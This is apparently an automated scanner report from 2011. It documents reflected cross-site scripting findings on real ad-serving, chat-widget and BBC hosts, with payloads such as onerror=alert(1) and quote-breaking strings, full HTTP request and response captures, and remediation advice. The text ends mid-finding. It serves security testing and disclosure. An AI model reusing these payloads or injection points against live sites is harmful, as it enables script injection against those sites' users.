The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload eeafe<img%20src%3da%20onerror%3dalert(1)>f3c04e68bbd was submitted in the msessionkey parameter. This input was echoed as eeafe<img src=a onerror=alert(1)>f3c04e68bbd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload eb032<img%20src%3da%20onerror%3dalert(1)>8b99717b9c6 was submitted in the msessionkey parameter. This input was echoed as eb032<img src=a onerror=alert(1)>8b99717b9c6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload 8ef88%0a4a4a6ebaf7c was submitted in the site parameter. This input was echoed as 8ef88 4a4a6ebaf7c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript comment into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 16:24:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2141
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDQCQBRCDS=NBOOLMLDFMJDCHCCGJELJLJM; path=/
Cache-control: public, max-age=3600, s-maxage=3600
//Plugins for site 105028888ef88 4a4a6ebaf7c lpAddMonitorTag(); typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maem ...[SNIP]...
The value of the 173663;201;js;MSN;300x250Retargeting/?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74525"-alert(1)-"b573390ac42 was submitted in the 173663;201;js;MSN;300x250Retargeting/?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/1/16780;173663;201;js;MSN;300x250Retargeting/?click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=74525"-alert(1)-"b573390ac42&ftx=&fty=&ftadz=&ftscw=&cachebuster=765046.4775506407 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=1630601381
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 03 Aug 2011 12:40:29 GMT
Server: Jetty(6.1.22)
Content-Type: text/javascript
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 577
var ftGUID_173663="1310110B6FAA0E"; var ftConfID_173663="221014001"; var ftParams_173663="click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=74525"-alert(1)-"b573390ac42&ftx=&fty=&ftadz=&ftscw=&cachebuster=765046.4775506407"; var ftKeyword_173663=""; var ftSegment_173663=""; var ftSegmentList_173663=[]; var ftRuleMatch_173663="0";
The value of the cachebuster request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1df02"-alert(1)-"a409d46f3c0 was submitted in the cachebuster parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/1/16780;173663;201;js;MSN;300x250Retargeting/?click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=&cachebuster=765046.47755064071df02"-alert(1)-"a409d46f3c0 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=1630601381
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 03 Aug 2011 12:40:51 GMT
Server: Jetty(6.1.22)
Content-Type: text/javascript
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 577
var ftGUID_173663="1310110B6FAA0E"; var ftConfID_173663="221314001"; var ftParams_173663="click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=&cachebuster=765046.47755064071df02"-alert(1)-"a409d46f3c0"; var ftKeyword_173663=""; var ftSegment_173663=""; var ftSegmentList_173663=[]; var ftRuleMatch_173663="0";
The value of the ftadz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7d85"-alert(1)-"ea0dbd3b447 was submitted in the ftadz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/1/16780;173663;201;js;MSN;300x250Retargeting/?click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=&ftadz=c7d85"-alert(1)-"ea0dbd3b447&ftscw=&cachebuster=765046.4775506407 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=1630601381
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 03 Aug 2011 12:40:42 GMT
Server: Jetty(6.1.22)
Content-Type: text/javascript
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 577
var ftGUID_173663="1310110B6FAA0E"; var ftConfID_173663="221014001"; var ftParams_173663="click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=&ftadz=c7d85"-alert(1)-"ea0dbd3b447&ftscw=&cachebuster=765046.4775506407"; var ftKeyword_173663=""; var ftSegment_173663=""; var ftSegmentList_173663=[]; var ftRuleMatch_173663="0";
The value of the ftscw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54a8e"-alert(1)-"29096755ce7 was submitted in the ftscw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/1/16780;173663;201;js;MSN;300x250Retargeting/?click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=54a8e"-alert(1)-"29096755ce7&cachebuster=765046.4775506407 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=1630601381
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 03 Aug 2011 12:40:46 GMT
Server: Jetty(6.1.22)
Content-Type: text/javascript
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 577
var ftGUID_173663="1310110B6FAA0E"; var ftConfID_173663="221014001"; var ftParams_173663="click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=54a8e"-alert(1)-"29096755ce7&cachebuster=765046.4775506407"; var ftKeyword_173663=""; var ftSegment_173663=""; var ftSegmentList_173663=[]; var ftRuleMatch_173663="0";
The value of the ftx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b22e"-alert(1)-"fea16b4d912 was submitted in the ftx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/1/16780;173663;201;js;MSN;300x250Retargeting/?click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=9b22e"-alert(1)-"fea16b4d912&fty=&ftadz=&ftscw=&cachebuster=765046.4775506407 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=1630601381
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Date: Wed, 03 Aug 2011 12:40:33 GMT
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Server: Jetty(6.1.22)
Content-Type: text/javascript
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 577
var ftGUID_173663="1310110B6FAA0E"; var ftConfID_173663="221314001"; var ftParams_173663="click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=9b22e"-alert(1)-"fea16b4d912&fty=&ftadz=&ftscw=&cachebuster=765046.4775506407"; var ftKeyword_173663=""; var ftSegment_173663=""; var ftSegmentList_173663=[]; var ftRuleMatch_173663="0";
The value of the fty request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0cd8"-alert(1)-"436f8610cd4 was submitted in the fty parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/1/16780;173663;201;js;MSN;300x250Retargeting/?click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=d0cd8"-alert(1)-"436f8610cd4&ftadz=&ftscw=&cachebuster=765046.4775506407 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=1630601381
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 03 Aug 2011 12:40:38 GMT
Server: Jetty(6.1.22)
Content-Type: text/javascript
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 577
var ftGUID_173663="1310110B6FAA0E"; var ftConfID_173663="221314001"; var ftParams_173663="click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=d0cd8"-alert(1)-"436f8610cd4&ftadz=&ftscw=&cachebuster=765046.4775506407"; var ftKeyword_173663=""; var ftSegment_173663=""; var ftSegmentList_173663=[]; var ftRuleMatch_173663="0";
2.151. http://servedby.flashtalking.com/imp/1/16780 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://servedby.flashtalking.com
Path: /imp/1/16780
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 479d2"-alert(1)-"3e9411785fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/1/16780;173663;201;js;MSN;300x250Retargeting/?click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=&cachebuster=765046.4775506407&479d2"-alert(1)-"3e9411785fc=1 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=1630601381
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 03 Aug 2011 12:40:55 GMT
Server: Jetty(6.1.22)
Content-Type: text/javascript
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 580
var ftGUID_173663="1310110B6FAA0E"; var ftConfID_173663="221014001"; var ftParams_173663="click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=&cachebuster=765046.4775506407&479d2"-alert(1)-"3e9411785fc=1"; var ftKeyword_173663=""; var ftSegment_173663=""; var ftSegmentList_173663=[]; var ftRuleMatch_173663="0";
The value of the 89704;201;js;MMN;300x250RON/?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b356"-alert(1)-"5c5b4b4f79 was submitted in the 89704;201;js;MMN;300x250RON/?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:02:13 GMT
Server: Jetty(6.1.22)
Content-Length: 570
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 iad061104000000 (MII-APC/2.0)
var ftGUID_89704="1310110B6FAA0E"; var ftConfID_89704="135427"; var ftParams_89704="click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=7b356"-alert(1)-"5c5b4b4f79&ftx=&fty=&ftadz=&ftscw=&cachebuster=402290.103957057"; var ftKeyword_89704=""; var ftSegment_89704=""; var ftSegmentList_89704=[]; var ftRuleMatch_89704="0";
The value of the cachebuster request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adb3c"-alert(1)-"9434c654dac was submitted in the cachebuster parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:02:15 GMT
Server: Jetty(6.1.22)
Content-Length: 571
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 iad061102000000 (MII-APC/2.0)
var ftGUID_89704="1310110B6FAA0E"; var ftConfID_89704="155402"; var ftParams_89704="click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=&cachebuster=402290.103957057adb3c"-alert(1)-"9434c654dac"; var ftKeyword_89704=""; var ftSegment_89704=""; var ftSegmentList_89704=[]; var ftRuleMatch_89704="0";
The value of the ftadz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f25c"-alert(1)-"be4ab3bf776 was submitted in the ftadz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:02:27 GMT
Server: Jetty(6.1.22)
Cache-Control: no-cache, no-store
Content-Length: 571
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 iad061106 (MII-APC/2.0)
var ftGUID_89704="1310110B6FAA0E"; var ftConfID_89704="155402"; var ftParams_89704="click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=&ftx=&fty=&ftadz=8f25c"-alert(1)-"be4ab3bf776&ftscw=&cachebuster=402290.103957057"; var ftKeyword_89704=""; var ftSegment_89704=""; var ftSegmentList_89704=[]; var ftRuleMatch_89704="0";
The value of the ftscw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 934d9"-alert(1)-"34c51e25eb9 was submitted in the ftscw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:02:32 GMT
Server: Jetty(6.1.22)
Cache-Control: no-cache, no-store
Content-Length: 571
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
pragma: no-cache
Via: 1.1 iad061106 (MII-APC/2.0)
var ftGUID_89704="1310110B6FAA0E"; var ftConfID_89704="135427"; var ftParams_89704="click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=934d9"-alert(1)-"34c51e25eb9&cachebuster=402290.103957057"; var ftKeyword_89704=""; var ftSegment_89704=""; var ftSegmentList_89704=[]; var ftRuleMatch_89704="0";
The value of the ftx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2fce0"-alert(1)-"4c220599aef was submitted in the ftx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:02:18 GMT
Server: Jetty(6.1.22)
Cache-Control: no-cache, no-store
Content-Length: 571
pragma: no-cache
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 iad061106 (MII-APC/2.0)
var ftGUID_89704="1310110B6FAA0E"; var ftConfID_89704="155402"; var ftParams_89704="click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=&ftx=2fce0"-alert(1)-"4c220599aef&fty=&ftadz=&ftscw=&cachebuster=402290.103957057"; var ftKeyword_89704=""; var ftSegment_89704=""; var ftSegmentList_89704=[]; var ftRuleMatch_89704="0";
The value of the fty request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e708d"-alert(1)-"6f2d8ccd6e1 was submitted in the fty parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:02:22 GMT
Server: Jetty(6.1.22)
Cache-Control: no-cache, no-store
Content-Length: 571
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
pragma: no-cache
Via: 1.1 iad061105 (MII-APC/2.0)
var ftGUID_89704="1310110B6FAA0E"; var ftConfID_89704="155351"; var ftParams_89704="click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=&ftx=&fty=e708d"-alert(1)-"6f2d8ccd6e1&ftadz=&ftscw=&cachebuster=402290.103957057"; var ftKeyword_89704=""; var ftSegment_89704=""; var ftSegmentList_89704=[]; var ftRuleMatch_89704="0";
2.158. http://servedby.flashtalking.com/imp/14565 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://servedby.flashtalking.com
Path: /imp/14565
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload caef3"-alert(1)-"6f562582133 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:02:42 GMT
Server: Jetty(6.1.22)
Content-Length: 574
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 iad061106 (MII-APC/2.0)
var ftGUID_89704="1310110B6FAA0E"; var ftConfID_89704="137521"; var ftParams_89704="click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=&cachebuster=402290.103957057&caef3"-alert(1)-"6f562582133=1"; var ftKeyword_89704=""; var ftSegment_89704=""; var ftSegmentList_89704=[]; var ftRuleMatch_89704="0";
The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload f5503%0a8a1cfed8918 was submitted in the site parameter. This input was echoed as f5503 8a1cfed8918 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /visitor/addons/deploy.asp?site=72961245f5503%0a8a1cfed8918&d_id=sales HTTP/1.1 Host: sr2.liveperson.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.microsoftstore.com/store/msstore/home?WT.mc_id=MSCOM_DLC_US_BL_BuyMS
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT Content-Type: application/x-javascript Vary: Accept-Encoding Content-Length: 2141 Cache-Control: public, max-age=3600 Date: Thu, 04 Aug 2011 02:30:16 GMT Connection: close
//Plugins for site 72961245f5503 8a1cfed8918 lpAddMonitorTag(); typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maem ...[SNIP]...
The value of the callbackName request parameter is copied into the HTML document as plain text between tags. The payload fd9b0<script>alert(1)</script>2d73c8cea1 was submitted in the callbackName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1a24'-alert(1)-'4213cf6f59e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /worldservice/jsd1a24'-alert(1)-'4213cf6f59e/site_catalyst/s_code_bbcws.js?_=1312371710710 HTTP/1.1 Host: wscdn.bbc.co.uk User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://verde.br.msn.com/tubar%c3%a3o-de-500-kg-pula-dentro-de-barco-na-%c3%a1frica-do-sul-1
Response
HTTP/1.1 404 Not Found Server: Apache Accept-Ranges: bytes Content-Type: text/html Cache-Control: private, max-age=31535999 Date: Wed, 03 Aug 2011 11:42:11 GMT Content-Length: 24278 Connection: close Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f09e'-alert(1)-'3f555978f4d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
